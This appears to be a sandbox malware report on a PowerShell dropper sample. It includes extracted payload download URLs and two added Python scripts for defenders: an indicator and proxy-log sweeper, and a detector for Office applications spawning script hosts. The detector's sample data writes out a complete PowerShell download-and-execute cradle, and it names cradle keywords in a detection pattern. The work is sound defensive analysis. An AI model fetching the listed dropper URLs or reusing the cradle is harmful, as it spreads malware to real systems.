General

  • Target

    9f4f0ff572b38581d00b1c369d9cd56c_JaffaCakes118

  • Size

    177KB

  • Sample

    240611-x77ndayekm

  • MD5

    9f4f0ff572b38581d00b1c369d9cd56c

  • SHA1

    6141cd20ba2bb473769a301c1ade5a56ce330844

  • SHA256

    2bdb231a4e071c32f3734fa0ac5a13e5463ad6aea21e4a089fe1a1c69a56d372

  • SHA512

    d0bd93ccdbf3d2367b37610e96e5003cce4d86ccf073a212415c137682a1b7376802d64a35bd44913817038c713565af6ca24a395f3485e38fb15f27c4da4346

  • SSDEEP

    1536:GkPkfrdi1Ir77zOH98Wj2gpng9+a9AGnut1ExbYCYWOFBfM0jKCQ2g1:grfrzOH98ipg1uiX10+Cng1

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper (7 payload download URLs)

    https://santyago.org/wp-content/0mcYS6/
    http://dandyair.com/font-awesome/rOOAL/
    https://www.tekadbatam.com/wp-content/AUiw/
    http://kellymorganscience.com/wp-content/SCsWM/
    https://tewoerd.eu/img/DALSKE/
    http://mediainmedia.com/plugin_opencart2.3-master/Atye/
    http://nuwagi.com/old/XLGjc/
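The extracted config is a list of URLs that a PowerShell script fetches an executable from. The script below, added here as an example and not part of the tria.ge report or its tooling, turns that list into usable indicators (host, path, defanged URL) and sweeps proxy log lines for requests to them. It assumes the URLs are alternative download locations for the same payload (the report lists them without describing the script's retry logic), and the proxy log lines are constructed for the demo.

```python
"""Turn the exe.dropper URLs from the extracted PowerShell config into IOCs and
sweep proxy logs for them. Added example, not tria.ge tooling; the log lines
below are constructed for the demo."""
import re
from urllib.parse import urlparse

# The seven exe.dropper URLs listed in the extracted config. Treated here as
# alternative download locations for the same payload (an assumption; the
# report lists them without describing the script's retry logic).
DROPPER_URLS = [
    "https://santyago.org/wp-content/0mcYS6/",
    "http://dandyair.com/font-awesome/rOOAL/",
    "https://www.tekadbatam.com/wp-content/AUiw/",
    "http://kellymorganscience.com/wp-content/SCsWM/",
    "https://tewoerd.eu/img/DALSKE/",
    "http://mediainmedia.com/plugin_opencart2.3-master/Atye/",
    "http://nuwagi.com/old/XLGjc/",
]


def defang(url: str) -> str:
    """Render a URL so it is not clickable or auto-linked when pasted in a ticket."""
    return (url.replace("https://", "hxxps://")
               .replace("http://", "hxxp://")
               .replace(".", "[.]"))


def iocs(urls=DROPPER_URLS):
    """Split each URL into host and path indicators.

    Paths like wp-content/ and plugin_opencart2.3-master/ suggest ordinary CMS
    sites that were compromised, so the host alone is a weak indicator; the
    random-looking directory is the specific one and is kept separately.
    """
    out = []
    for u in urls:
        p = urlparse(u)
        out.append({
            "url": u,
            "host": p.hostname.lower(),
            "path": p.path,
            "defanged": defang(u),
        })
    return out


# Requested URL as it appears in a Squid-style access log (or any log that
# carries the full URL): scheme, host, optional port, path.
_REQ = re.compile(r"https?://([A-Za-z0-9.-]+)(?::\d+)?(/\S*)?")


def sweep_proxy_log(lines, urls=DROPPER_URLS):
    """Return (line_number, matched_url) for every log line whose requested URL
    is one of the dropper URLs. Matching is by host plus path prefix, ignoring
    scheme and host case, because proxies log these inconsistently."""
    targets = {(urlparse(u).hostname.lower(), urlparse(u).path): u for u in urls}
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if not m:
            continue
        host, path = m.group(1).lower(), m.group(2) or "/"
        for (t_host, t_path), u in targets.items():
            if host == t_host and path.startswith(t_path):
                hits.append((n, u))
                break
    return hits


# Constructed Squid-style access log: one benign request, two dropper fetches
# (one with the host in upper case), and a benign page on a dropper host.
SAMPLE_LOG = [
    "1718100001.101 312 10.0.0.5 TCP_MISS/200 5120 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html",
    "1718100002.220 948 10.0.0.5 TCP_MISS/404 410 GET https://santyago.org/wp-content/0mcYS6/ - HIER_DIRECT/203.0.113.10 text/html",
    "1718100003.405 1207 10.0.0.5 TCP_MISS/200 181248 GET http://DANDYAIR.com/font-awesome/rOOAL/ - HIER_DIRECT/203.0.113.11 application/octet-stream",
    "1718100004.010 120 10.0.0.7 TCP_MISS/200 2231 GET http://dandyair.com/index.html - HIER_DIRECT/203.0.113.11 text/html",
]

if __name__ == "__main__":
    for i in iocs():
        print(i["defanged"])
    for n, u in sweep_proxy_log(SAMPLE_LOG):
        print(f"line {n}: fetched {defang(u)}")
```

The sweep deliberately keys on host plus path prefix rather than the full URL string: the 404 on the first host is still a hit worth investigating (the dropper moves on to the next URL), and a request to the same host's front page is not.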

Targets

    • Target

      9f4f0ff572b38581d00b1c369d9cd56c_JaffaCakes118

    • Size

      177KB

    • MD5, SHA1, SHA256, SHA512, SSDEEP

      Identical to the hashes listed under General above.

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
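The first signature fires when a process starts a child it has no business starting, the usual sign that a document handler was driven by an exploit or macro. The detector below, added here as an example and not tria.ge's signature logic, implements that rule over constructed Sysmon Event ID 1 style records: a document handler (assumed set: Office applications and Acrobat Reader) spawning a script host or LOLBin is an alert, and the alert is raised to high when the command line also carries PowerShell download-cradle tokens, since the extracted config on this page is a ps1 script whose purpose is fetching an exe. The parent and child sets, the allowlist and the sample events are all assumptions for the demo.

```python
"""Detector for the 'process spawned unexpected child process' signature, run
over constructed Sysmon Event ID 1 style records. Added example; the
parent/child policy is an assumption, not tria.ge's signature logic."""
from dataclasses import dataclass
import ntpath
import re


@dataclass
class ProcessCreate:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the creating process
    command_line: str


# Parents whose normal compromise path is an exploit or macro: document
# handlers (assumed set, tune to your estate).
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe",
                     "outlook.exe", "acrord32.exe"}

# Children that mean arbitrary code ran if a document handler started them.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "bitsadmin.exe"}

# (parent, child) pairs to suppress, e.g. a documented add-in that shells out.
# Empty by default so every pair fires; populate from your own baseline.
ALLOWLIST = set()

# Tokens typical of a PowerShell download cradle. They raise priority only;
# the alert itself does not depend on them (heuristic, assumed list).
DOWNLOAD_TOKENS = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|-enc(odedcommand)?\b|frombase64string", re.I)


def _name(path: str) -> str:
    """Lower-cased image file name; ntpath handles Windows paths on any OS."""
    return ntpath.basename(path).lower()


def unexpected_children(events, allowlist=ALLOWLIST):
    """Return (event, severity) for each document handler -> script host spawn.

    severity is 'high' when the child's command line carries download-cradle
    tokens, otherwise 'medium'. Pairs in allowlist are skipped."""
    hits = []
    for e in events:
        parent, child = _name(e.parent_image), _name(e.image)
        if parent not in DOCUMENT_HANDLERS or child not in SCRIPT_HOSTS:
            continue
        if (parent, child) in allowlist:
            continue
        sev = "high" if DOWNLOAD_TOKENS.search(e.command_line) else "medium"
        hits.append((e, sev))
    return hits


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: Word opened by Explorer (benign), Word spawning a
# PowerShell download cradle (high), Word spawning the print helper (benign),
# Excel spawning cmd (medium), and cmd spawning PowerShell (not a document
# handler, so no alert). The URL in the cradle is a placeholder.
SAMPLE_EVENTS = [
    ProcessCreate(4120, OFFICE + r"\WINWORD.EXE", r"C:\Windows\explorer.exe",
                  '"WINWORD.EXE" /n invoice.doc'),
    ProcessCreate(4388, PS, OFFICE + r"\WINWORD.EXE",
                  "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/x')\""),
    ProcessCreate(4402, r"C:\Windows\splwow64.exe", OFFICE + r"\WINWORD.EXE",
                  "splwow64.exe 12288"),
    ProcessCreate(4510, r"C:\Windows\System32\cmd.exe", OFFICE + r"\EXCEL.EXE",
                  "cmd.exe /c echo hi"),
    ProcessCreate(4611, PS, r"C:\Windows\System32\cmd.exe",
                  "powershell -File backup.ps1"),
]

if __name__ == "__main__":
    for e, sev in unexpected_children(SAMPLE_EVENTS):
        print(f"[{sev}] pid {e.pid}: {_name(e.parent_image)} -> {_name(e.image)}")
```

Matching on the image file name rather than the full path keeps the rule working across Office install locations, at the cost that a renamed binary evades it; pair it with a rule on the original file name field if your telemetry carries one.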
